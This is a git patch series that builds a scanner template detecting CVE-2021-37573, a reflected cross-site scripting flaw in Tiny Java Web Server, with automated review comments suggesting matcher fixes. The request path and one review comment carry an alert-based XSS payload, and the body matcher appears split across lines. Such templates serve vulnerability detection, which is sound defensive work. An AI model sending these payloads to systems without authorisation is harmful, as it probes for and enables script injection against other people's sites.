From 1ea3dfe3b7309b80f279fab41a1b9f21cf9970b3 Mon Sep 17 00:00:00 2001
From: Geeknik Labs <466878+geeknik@users.noreply.github.com>
Date: Fri, 13 Aug 2021 17:14:13 -0500
Subject: [PATCH 1/4] Create CVE-2021-37573.yaml
---
cves/2021/CVE-2021-37573.yaml | 24 ++++++++++++++++++++++++
1 file changed, 24 insertions(+)
create mode 100644 cves/2021/CVE-2021-37573.yaml
diff --git a/cves/2021/CVE-2021-37573.yaml b/cves/2021/CVE-2021-37573.yaml
new file mode 100644
index 0000000000..5474803cf9
--- /dev/null
+++ b/cves/2021/CVE-2021-37573.yaml
@@ -0,0 +1,24 @@
+id: CVE-2021-37573
+
+info:
+ name: Tiny Java Web Server Reflected XSS
+ reference:
+ - https://seclists.org/fulldisclosure/2021/Aug/13
+ author: geeknik
+ severity: medium
+ tags: cve,cve2021,xss,tjws
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/te%3Cimg%20src=x%20onerror=alert(42)%3Est"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 404
+ - type: word
+ part: body
+ words:
+ - "
404 test not found
"
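Review bot: The body word matcher at the end of this hunk, as displayed here, reads `404 test not found` split over three lines and does not contain the `<img src=x onerror=alert(42)>` markup sent in the request path, so it cannot tell a raw reflection from an HTML-encoded one. The markup may simply have been lost when this page was rendered. If it is missing in the template itself, the word should be the literal unencoded reflection on one line, single-quoted so nothing is escaped, e.g. `- '404 te<img src=x onerror=alert(42)>st not found'` (adjusted to the server's actual 404 body). The same string is carried unchanged as context in patches 3 and 4. A short comment above the matcher, such as `# matches only when the payload comes back unencoded`, would also help the next reviewer.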
From eed8e2e57330d35dce5b5cb25232ba1345d82bea Mon Sep 17 00:00:00 2001
From: Geeknik Labs <466878+geeknik@users.noreply.github.com>
Date: Fri, 13 Aug 2021 17:17:18 -0500
Subject: [PATCH 2/4] Update CVE-2021-37573.yaml
---
cves/2021/CVE-2021-37573.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-37573.yaml b/cves/2021/CVE-2021-37573.yaml
index 5474803cf9..6941c6cd68 100644
--- a/cves/2021/CVE-2021-37573.yaml
+++ b/cves/2021/CVE-2021-37573.yaml
@@ -1,6 +1,6 @@
id: CVE-2021-37573
-info:
+info:
name: Tiny Java Web Server Reflected XSS
reference:
- https://seclists.org/fulldisclosure/2021/Aug/13
From 344fba3089f73121b44ab8c1023d6ed3a2f3897c Mon Sep 17 00:00:00 2001
From: Geeknik Labs <466878+geeknik@users.noreply.github.com>
Date: Fri, 13 Aug 2021 17:17:35 -0500
Subject: [PATCH 3/4] Update CVE-2021-37573.yaml
---
cves/2021/CVE-2021-37573.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-37573.yaml b/cves/2021/CVE-2021-37573.yaml
index 6941c6cd68..4419e9d6d0 100644
--- a/cves/2021/CVE-2021-37573.yaml
+++ b/cves/2021/CVE-2021-37573.yaml
@@ -18,7 +18,7 @@ requests:
- type: status
status:
- 404
- - type: word
+ - type: word
part: body
words:
- "404 test not found
"
From b5123f5abed89801b344ebcee3c95e7839128f46 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sat, 14 Aug 2021 14:40:52 +0530
Subject: [PATCH 4/4] Update CVE-2021-37573.yaml
---
cves/2021/CVE-2021-37573.yaml | 12 +++++++++---
1 file changed, 9 insertions(+), 3 deletions(-)
diff --git a/cves/2021/CVE-2021-37573.yaml b/cves/2021/CVE-2021-37573.yaml
index 4419e9d6d0..6c9c42fe15 100644
--- a/cves/2021/CVE-2021-37573.yaml
+++ b/cves/2021/CVE-2021-37573.yaml
@@ -1,11 +1,11 @@
id: CVE-2021-37573
info:
- name: Tiny Java Web Server Reflected XSS
- reference:
- - https://seclists.org/fulldisclosure/2021/Aug/13
+ name: Tiny Java Web Server - Reflected XSS
author: geeknik
severity: medium
+ reference:
+ - https://seclists.org/fulldisclosure/2021/Aug/13
tags: cve,cve2021,xss,tjws
requests:
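Review bot: The `info` block still has no `description`, so a finding from this template tells the person triaging it nothing beyond the name and a mailing-list link. I would add a one-line `description:` under `name` stating that the requested path is reflected unencoded into the 404 page, together with the affected and fixed versions taken from the referenced advisory. Moving `reference` below `severity` is fine as it stands.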
@@ -18,7 +18,13 @@ requests:
- type: status
status:
- 404
+
- type: word
part: body
words:
- "404 test not found
"
+
+ - type: word
+ part: header
+ words:
+ - text/html